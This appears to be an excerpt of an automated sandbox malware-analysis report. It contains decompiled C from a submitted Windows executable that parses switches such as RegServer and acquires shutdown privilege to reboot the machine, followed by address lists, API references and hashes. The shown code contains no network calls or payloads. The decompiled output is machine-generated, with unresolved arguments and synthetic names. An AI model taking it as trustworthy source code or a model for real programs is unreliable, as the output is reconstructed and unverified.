                                                                                                                                                                                                                                            																		if(_t201 != 0) {
                                                                                                                                                                                                                                            																			_t220 =  &_v265;
                                                                                                                                                                                                                                            																			do {
                                                                                                                                                                                                                                            																				_t220 = _t220 + 1;
                                                                                                                                                                                                                                            																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                                                            																				if(_t142 == 0) {
                                                                                                                                                                                                                                            																					_t143 = 2;
                                                                                                                                                                                                                                            																					 *0x329a2c =  *0x329a2c | _t143;
                                                                                                                                                                                                                                            																					goto L70;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t145 = _t142 - 3;
                                                                                                                                                                                                                                            																					if(_t145 == 0) {
                                                                                                                                                                                                                                            																						 *0x328d48 =  *0x328d48 | 0x00000040;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						_t146 = _t145 - 5;
                                                                                                                                                                                                                                            																						if(_t146 == 0) {
                                                                                                                                                                                                                                            																							 *0x329a2c =  *0x329a2c & 0xfffffffd;
                                                                                                                                                                                                                                            																							goto L70;
                                                                                                                                                                                                                                            																						} else {
                                                                                                                                                                                                                                            																							_t147 = _t146 - 5;
                                                                                                                                                                                                                                            																							if(_t147 == 0) {
                                                                                                                                                                                                                                            																								 *0x329a2c =  *0x329a2c & 0xfffffffe;
                                                                                                                                                                                                                                            																								goto L70;
                                                                                                                                                                                                                                            																							} else {
                                                                                                                                                                                                                                            																								_t149 = _t147;
                                                                                                                                                                                                                                            																								if(_t149 == 0) {
                                                                                                                                                                                                                                            																									 *0x328d48 =  *0x328d48 | 0x00000080;
                                                                                                                                                                                                                                            																								} else {
                                                                                                                                                                                                                                            																									if(_t149 == 3) {
                                                                                                                                                                                                                                            																										 *0x329a2c =  *0x329a2c | 0x00000004;
                                                                                                                                                                                                                                            																										L70:
                                                                                                                                                                                                                                            																										 *0x328a28 = 1;
                                                                                                                                                                                                                                            																									} else {
                                                                                                                                                                                                                                            																										_t209 = 0;
                                                                                                                                                                                                                                            																									}
                                                                                                                                                                                                                                            																								}
                                                                                                                                                                                                                                            																							}
                                                                                                                                                                                                                                            																						}
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				_t144 =  *_t220;
                                                                                                                                                                                                                                            																				_t201 = _t144;
                                                                                                                                                                                                                                            																			} while (_t144 != 0);
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	 *0x329a2c = 3;
                                                                                                                                                                                                                                            																	 *0x328a28 = 1;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            																goto L50;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																if(_t132 == 0) {
                                                                                                                                                                                                                                            																	goto L98;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	L49:
                                                                                                                                                                                                                                            																	_t209 = 0;
                                                                                                                                                                                                                                            																	L50:
                                                                                                                                                                                                                                            																	_t173 = _v272;
                                                                                                                                                                                                                                            																	if( *_t173 != 0) {
                                                                                                                                                                                                                                            																		goto L2;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		break;
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L106;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										L34:
                                                                                                                                                                                                                                            										_t209 = 0;
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L131;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if( *0x328a2c != 0 &&  *0x328b3e == 0) {
                                                                                                                                                                                                                                            						if(GetModuleFileNameA( *0x329a3c, 0x328b3e, 0x104) == 0) {
                                                                                                                                                                                                                                            							_t209 = 0;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t202 = 0x5c;
                                                                                                                                                                                                                                            							 *((char*)(E003266C8(0x328b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t63 = _t209;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L131:
                                                                                                                                                                                                                                            			}


































































                                                                                                                                                                                                                                            0x00325c9e
                                                                                                                                                                                                                                            0x00325ca9
                                                                                                                                                                                                                                            0x00325cb0
                                                                                                                                                                                                                                            0x00325cb3
                                                                                                                                                                                                                                            0x00325cb6
                                                                                                                                                                                                                                            0x00325cb7
                                                                                                                                                                                                                                            0x00325cb8
                                                                                                                                                                                                                                            0x00325cbd
                                                                                                                                                                                                                                            0x00326204
                                                                                                                                                                                                                                            0x00325ccb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325ccb
                                                                                                                                                                                                                                            0x00325cd3
                                                                                                                                                                                                                                            0x00325cd7
                                                                                                                                                                                                                                            0x00325cf4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325cf4
                                                                                                                                                                                                                                            0x00325cf8
                                                                                                                                                                                                                                            0x00325d00
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325d06
                                                                                                                                                                                                                                            0x00325d06
                                                                                                                                                                                                                                            0x00325d0e
                                                                                                                                                                                                                                            0x00325d10
                                                                                                                                                                                                                                            0x00325d12
                                                                                                                                                                                                                                            0x00325d14
                                                                                                                                                                                                                                            0x00325d15
                                                                                                                                                                                                                                            0x00325d17
                                                                                                                                                                                                                                            0x00325d49
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325d19
                                                                                                                                                                                                                                            0x00325d19
                                                                                                                                                                                                                                            0x00325d1d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325d3f
                                                                                                                                                                                                                                            0x00325d3f
                                                                                                                                                                                                                                            0x00325d4b
                                                                                                                                                                                                                                            0x00325d4b
                                                                                                                                                                                                                                            0x00325d4f
                                                                                                                                                                                                                                            0x00325d8d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325d93
                                                                                                                                                                                                                                            0x00325d93
                                                                                                                                                                                                                                            0x00325d9a
                                                                                                                                                                                                                                            0x00325d9d
                                                                                                                                                                                                                                            0x00325d9e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325d9e
                                                                                                                                                                                                                                            0x00325d51
                                                                                                                                                                                                                                            0x00325d5b
                                                                                                                                                                                                                                            0x00325d72
                                                                                                                                                                                                                                            0x003260fb
                                                                                                                                                                                                                                            0x003260fb
                                                                                                                                                                                                                                            0x00326207
                                                                                                                                                                                                                                            0x0032620a
                                                                                                                                                                                                                                            0x0032620b
                                                                                                                                                                                                                                            0x0032620e
                                                                                                                                                                                                                                            0x00326217
                                                                                                                                                                                                                                            0x00325d78
                                                                                                                                                                                                                                            0x00325d78
                                                                                                                                                                                                                                            0x00325d80
                                                                                                                                                                                                                                            0x00325d83
                                                                                                                                                                                                                                            0x00325d84
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325d84
                                                                                                                                                                                                                                            0x00325d5d
                                                                                                                                                                                                                                            0x00325d5f
                                                                                                                                                                                                                                            0x00325d62
                                                                                                                                                                                                                                            0x00325d68
                                                                                                                                                                                                                                            0x00325d64
                                                                                                                                                                                                                                            0x00325d64
                                                                                                                                                                                                                                            0x00325d64
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325d62
                                                                                                                                                                                                                                            0x00325d5b
                                                                                                                                                                                                                                            0x00325d4f
                                                                                                                                                                                                                                            0x00325d1d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325d9f
                                                                                                                                                                                                                                            0x00325d9f
                                                                                                                                                                                                                                            0x00325da5
                                                                                                                                                                                                                                            0x00325dab
                                                                                                                                                                                                                                            0x00325dba
                                                                                                                                                                                                                                            0x00326218
                                                                                                                                                                                                                                            0x0032621d
                                                                                                                                                                                                                                            0x00326220
                                                                                                                                                                                                                                            0x00326221
                                                                                                                                                                                                                                            0x00326229
                                                                                                                                                                                                                                            0x00326230
                                                                                                                                                                                                                                            0x00326247
                                                                                                                                                                                                                                            0x0032626a
                                                                                                                                                                                                                                            0x00326272
                                                                                                                                                                                                                                            0x00326249
                                                                                                                                                                                                                                            0x00326255
                                                                                                                                                                                                                                            0x0032625f
                                                                                                                                                                                                                                            0x00326264
                                                                                                                                                                                                                                            0x00326264
                                                                                                                                                                                                                                            0x00326284
                                                                                                                                                                                                                                            0x00325dc0
                                                                                                                                                                                                                                            0x00325dc0
                                                                                                                                                                                                                                            0x00325dca
                                                                                                                                                                                                                                            0x00325e22
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325dcc
                                                                                                                                                                                                                                            0x00325dce
                                                                                                                                                                                                                                            0x00325e24
                                                                                                                                                                                                                                            0x00325e24
                                                                                                                                                                                                                                            0x00325e2c
                                                                                                                                                                                                                                            0x00325e47
                                                                                                                                                                                                                                            0x00325e4a
                                                                                                                                                                                                                                            0x003261d2
                                                                                                                                                                                                                                            0x003261e2
                                                                                                                                                                                                                                            0x003261e7
                                                                                                                                                                                                                                            0x003261ee
                                                                                                                                                                                                                                            0x003261f1
                                                                                                                                                                                                                                            0x003261f1
                                                                                                                                                                                                                                            0x003261f8
                                                                                                                                                                                                                                            0x003261f8
                                                                                                                                                                                                                                            0x00325e50
                                                                                                                                                                                                                                            0x00325e53
                                                                                                                                                                                                                                            0x00326109
                                                                                                                                                                                                                                            0x0032611f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00326125
                                                                                                                                                                                                                                            0x00326137
                                                                                                                                                                                                                                            0x0032613a
                                                                                                                                                                                                                                            0x0032613c
                                                                                                                                                                                                                                            0x0032613e
                                                                                                                                                                                                                                            0x0032613e
                                                                                                                                                                                                                                            0x00326141
                                                                                                                                                                                                                                            0x00326141
                                                                                                                                                                                                                                            0x00326143
                                                                                                                                                                                                                                            0x00326144
                                                                                                                                                                                                                                            0x0032614a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00326150
                                                                                                                                                                                                                                            0x00326152
                                                                                                                                                                                                                                            0x0032615c
                                                                                                                                                                                                                                            0x00326170
                                                                                                                                                                                                                                            0x00326172
                                                                                                                                                                                                                                            0x0032617c
                                                                                                                                                                                                                                            0x00326190
                                                                                                                                                                                                                                            0x00326190
                                                                                                                                                                                                                                            0x00326196
                                                                                                                                                                                                                                            0x003261a5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003261ab
                                                                                                                                                                                                                                            0x003261b9
                                                                                                                                                                                                                                            0x003261c6
                                                                                                                                                                                                                                            0x003261c6
                                                                                                                                                                                                                                            0x0032617e
                                                                                                                                                                                                                                            0x00326180
                                                                                                                                                                                                                                            0x0032618a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032618a
                                                                                                                                                                                                                                            0x0032615e
                                                                                                                                                                                                                                            0x00326160
                                                                                                                                                                                                                                            0x0032616a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032616a
                                                                                                                                                                                                                                            0x0032615c
                                                                                                                                                                                                                                            0x0032614a
                                                                                                                                                                                                                                            0x0032610b
                                                                                                                                                                                                                                            0x0032610e
                                                                                                                                                                                                                                            0x0032610e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325e59
                                                                                                                                                                                                                                            0x00325e59
                                                                                                                                                                                                                                            0x00325e5c
                                                                                                                                                                                                                                            0x0032604f
                                                                                                                                                                                                                                            0x00326056
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032605c
                                                                                                                                                                                                                                            0x0032606e
                                                                                                                                                                                                                                            0x00326071
                                                                                                                                                                                                                                            0x00326073
                                                                                                                                                                                                                                            0x00326075
                                                                                                                                                                                                                                            0x00326075
                                                                                                                                                                                                                                            0x00326078
                                                                                                                                                                                                                                            0x00326078
                                                                                                                                                                                                                                            0x0032607a
                                                                                                                                                                                                                                            0x0032607b
                                                                                                                                                                                                                                            0x00326081
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00326087
                                                                                                                                                                                                                                            0x00326087
                                                                                                                                                                                                                                            0x0032608d
                                                                                                                                                                                                                                            0x0032609c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003260a2
                                                                                                                                                                                                                                            0x003260aa
                                                                                                                                                                                                                                            0x003260b2
                                                                                                                                                                                                                                            0x003260b7
                                                                                                                                                                                                                                            0x003260bd
                                                                                                                                                                                                                                            0x003260bf
                                                                                                                                                                                                                                            0x003260bf
                                                                                                                                                                                                                                            0x003260d6
                                                                                                                                                                                                                                            0x003260e0
                                                                                                                                                                                                                                            0x003260e7
                                                                                                                                                                                                                                            0x003260f5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003260f5
                                                                                                                                                                                                                                            0x0032609c
                                                                                                                                                                                                                                            0x00326081
                                                                                                                                                                                                                                            0x00325e62
                                                                                                                                                                                                                                            0x00325e62
                                                                                                                                                                                                                                            0x00325e65
                                                                                                                                                                                                                                            0x00325fd3
                                                                                                                                                                                                                                            0x00325fe9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325fef
                                                                                                                                                                                                                                            0x00325fef
                                                                                                                                                                                                                                            0x00325ff7
                                                                                                                                                                                                                                            0x00325ffd
                                                                                                                                                                                                                                            0x00326003
                                                                                                                                                                                                                                            0x00326006
                                                                                                                                                                                                                                            0x00326011
                                                                                                                                                                                                                                            0x00326014
                                                                                                                                                                                                                                            0x0032603d
                                                                                                                                                                                                                                            0x00326016
                                                                                                                                                                                                                                            0x00326018
                                                                                                                                                                                                                                            0x00326019
                                                                                                                                                                                                                                            0x0032601b
                                                                                                                                                                                                                                            0x00326033
                                                                                                                                                                                                                                            0x0032601d
                                                                                                                                                                                                                                            0x00326020
                                                                                                                                                                                                                                            0x00326029
                                                                                                                                                                                                                                            0x00326022
                                                                                                                                                                                                                                            0x00326022
                                                                                                                                                                                                                                            0x00326022
                                                                                                                                                                                                                                            0x00326020
                                                                                                                                                                                                                                            0x0032601b
                                                                                                                                                                                                                                            0x00326042
                                                                                                                                                                                                                                            0x00326044
                                                                                                                                                                                                                                            0x00326046
                                                                                                                                                                                                                                            0x0032604a
                                                                                                                                                                                                                                            0x00325ff7
                                                                                                                                                                                                                                            0x00325fd5
                                                                                                                                                                                                                                            0x00325fd8
                                                                                                                                                                                                                                            0x00325fd8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325e6b
                                                                                                                                                                                                                                            0x00325e6b
                                                                                                                                                                                                                                            0x00325e6e
                                                                                                                                                                                                                                            0x00325f8b
                                                                                                                                                                                                                                            0x00325f99
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325f9f
                                                                                                                                                                                                                                            0x00325fa7
                                                                                                                                                                                                                                            0x00325faf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325fb1
                                                                                                                                                                                                                                            0x00325fb3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325fb5
                                                                                                                                                                                                                                            0x00325fb7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325fb9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325fb9
                                                                                                                                                                                                                                            0x00325fb7
                                                                                                                                                                                                                                            0x00325fb3
                                                                                                                                                                                                                                            0x00325faf
                                                                                                                                                                                                                                            0x00325f8d
                                                                                                                                                                                                                                            0x00325f8d
                                                                                                                                                                                                                                            0x00325f8d
                                                                                                                                                                                                                                            0x00325f8f
                                                                                                                                                                                                                                            0x00325fc1
                                                                                                                                                                                                                                            0x00325fc1
                                                                                                                                                                                                                                            0x00325fc1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325e74
                                                                                                                                                                                                                                            0x00325e74
                                                                                                                                                                                                                                            0x00325e77
                                                                                                                                                                                                                                            0x00325ea0
                                                                                                                                                                                                                                            0x00325ebd
                                                                                                                                                                                                                                            0x00325f79
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325f7f
                                                                                                                                                                                                                                            0x00325ec3
                                                                                                                                                                                                                                            0x00325ec3
                                                                                                                                                                                                                                            0x00325ecc
                                                                                                                                                                                                                                            0x00325ed4
                                                                                                                                                                                                                                            0x00325ed6
                                                                                                                                                                                                                                            0x00325edc
                                                                                                                                                                                                                                            0x00325edf
                                                                                                                                                                                                                                            0x00325eea
                                                                                                                                                                                                                                            0x00325eed
                                                                                                                                                                                                                                            0x00325f3f
                                                                                                                                                                                                                                            0x00325f40
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325eef
                                                                                                                                                                                                                                            0x00325eef
                                                                                                                                                                                                                                            0x00325ef2
                                                                                                                                                                                                                                            0x00325f34
                                                                                                                                                                                                                                            0x00325ef4
                                                                                                                                                                                                                                            0x00325ef4
                                                                                                                                                                                                                                            0x00325ef7
                                                                                                                                                                                                                                            0x00325f2b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325ef9
                                                                                                                                                                                                                                            0x00325ef9
                                                                                                                                                                                                                                            0x00325efc
                                                                                                                                                                                                                                            0x00325f22
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325efe
                                                                                                                                                                                                                                            0x00325eff
                                                                                                                                                                                                                                            0x00325f02
                                                                                                                                                                                                                                            0x00325f16
                                                                                                                                                                                                                                            0x00325f04
                                                                                                                                                                                                                                            0x00325f07
                                                                                                                                                                                                                                            0x00325f0d
                                                                                                                                                                                                                                            0x00325f46
                                                                                                                                                                                                                                            0x00325f46
                                                                                                                                                                                                                                            0x00325f09
                                                                                                                                                                                                                                            0x00325f09
                                                                                                                                                                                                                                            0x00325f09
                                                                                                                                                                                                                                            0x00325f07
                                                                                                                                                                                                                                            0x00325f02
                                                                                                                                                                                                                                            0x00325efc
                                                                                                                                                                                                                                            0x00325ef7
                                                                                                                                                                                                                                            0x00325ef2
                                                                                                                                                                                                                                            0x00325f4c
                                                                                                                                                                                                                                            0x00325f4e
                                                                                                                                                                                                                                            0x00325f50
                                                                                                                                                                                                                                            0x00325f54
                                                                                                                                                                                                                                            0x00325ed4
                                                                                                                                                                                                                                            0x00325ea2
                                                                                                                                                                                                                                            0x00325ea4
                                                                                                                                                                                                                                            0x00325eaf
                                                                                                                                                                                                                                            0x00325eaf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325e79
                                                                                                                                                                                                                                            0x00325e7d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325e83
                                                                                                                                                                                                                                            0x00325e83
                                                                                                                                                                                                                                            0x00325e83
                                                                                                                                                                                                                                            0x00325e85
                                                                                                                                                                                                                                            0x00325e85
                                                                                                                                                                                                                                            0x00325e8e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325e94
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325e94
                                                                                                                                                                                                                                            0x00325e8e
                                                                                                                                                                                                                                            0x00325e7d
                                                                                                                                                                                                                                            0x00325e77
                                                                                                                                                                                                                                            0x00325e6e
                                                                                                                                                                                                                                            0x00325e65
                                                                                                                                                                                                                                            0x00325e5c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325dd0
                                                                                                                                                                                                                                            0x00325dd0
                                                                                                                                                                                                                                            0x00325dd0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325dd0
                                                                                                                                                                                                                                            0x00325dce
                                                                                                                                                                                                                                            0x00325dca
                                                                                                                                                                                                                                            0x00325dba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325d00
                                                                                                                                                                                                                                            0x00325dd9
                                                                                                                                                                                                                                            0x00325e04
                                                                                                                                                                                                                                            0x003261fe
                                                                                                                                                                                                                                            0x00325e0a
                                                                                                                                                                                                                                            0x00325e0c
                                                                                                                                                                                                                                            0x00325e17
                                                                                                                                                                                                                                            0x00325e17
                                                                                                                                                                                                                                            0x00325e04
                                                                                                                                                                                                                                            0x00326200
                                                                                                                                                                                                                                            0x00326200
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharNextA.USER32(?,00000000,?,?), ref: 00325CEE
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00328B3E,00000104,00000000,?,?), ref: 00325DFC
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00325E3E
                                                                                                                                                                                                                                            • CharUpperA.USER32(-00000052), ref: 00325EE1
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00325F6F
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00325FA7
                                                                                                                                                                                                                                            • CharUpperA.USER32(-0000004E), ref: 00326008
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 003260AA
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00321140,00000000,00000040,00000000), ref: 003261F1
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 003261F8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                            • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                            • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                            • Opcode ID: 7de93b12946375b151e771b9bb9167b0b59a116f0541144489bc70f1aceb7eef
                                                                                                                                                                                                                                            • Instruction ID: bd2950bf3adc8e325e9c6c2b334bcb57c2642ede208c564ce7a158200c0048a2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7de93b12946375b151e771b9bb9167b0b59a116f0541144489bc70f1aceb7eef
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12D15C71A08E749FDF378B38BC4D7F97769AF26300F1640AAC486D6591DA708F868B40
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 60%
                                                                                                                                                                                                                                            			E00321F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                                            				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                            				int _t28;
                                                                                                                                                                                                                                            				signed char _t30;
                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t41 = __esi;
                                                                                                                                                                                                                                            				_t38 = __edi;
                                                                                                                                                                                                                                            				_t30 = __ecx;
                                                                                                                                                                                                                                            				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						if( *0x329a40 != 0) {
                                                                                                                                                                                                                                            							_pop(_t30);
                                                                                                                                                                                                                                            							_t44 = _t46;
                                                                                                                                                                                                                                            							_t13 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                                                            							_push(_t38);
                                                                                                                                                                                                                                            							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                                                            								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                                                            								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                                            								_v12 = 2;
                                                                                                                                                                                                                                            								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                                                            								CloseHandle(_v28);
                                                                                                                                                                                                                                            								_t41 = _t41;
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								if(_t21 != 0) {
                                                                                                                                                                                                                                            									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                                                            										_t25 = 1;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t37 = 0x4f7;
                                                                                                                                                                                                                                            										goto L3;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t37 = 0x4f6;
                                                                                                                                                                                                                                            									goto L4;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t37 = 0x4f5;
                                                                                                                                                                                                                                            								L3:
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								L4:
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								E003244B9(0, _t37);
                                                                                                                                                                                                                                            								_t25 = 0;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_pop(_t40);
                                                                                                                                                                                                                                            							return E00326CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t37 = 0x522;
                                                                                                                                                                                                                                            						_t28 = E003244B9(0, 0x522, 0x321140, 0, 0x40, 4);
                                                                                                                                                                                                                                            						if(_t28 != 6) {
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					__eax = E00321EA7(__ecx);
                                                                                                                                                                                                                                            					if(__eax != 2) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						return _t28;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                            0x00321f90
                                                                                                                                                                                                                                            0x00321f90
                                                                                                                                                                                                                                            0x00321f93
                                                                                                                                                                                                                                            0x00321f98
                                                                                                                                                                                                                                            0x00321fa4
                                                                                                                                                                                                                                            0x00321fa7
                                                                                                                                                                                                                                            0x00321fc5
                                                                                                                                                                                                                                            0x00321fcd
                                                                                                                                                                                                                                            0x00321fdb
                                                                                                                                                                                                                                            0x00321ee5
                                                                                                                                                                                                                                            0x00321eea
                                                                                                                                                                                                                                            0x00321ef1
                                                                                                                                                                                                                                            0x00321ef4
                                                                                                                                                                                                                                            0x00321f0c
                                                                                                                                                                                                                                            0x00321f2e
                                                                                                                                                                                                                                            0x00321f3a
                                                                                                                                                                                                                                            0x00321f46
                                                                                                                                                                                                                                            0x00321f4d
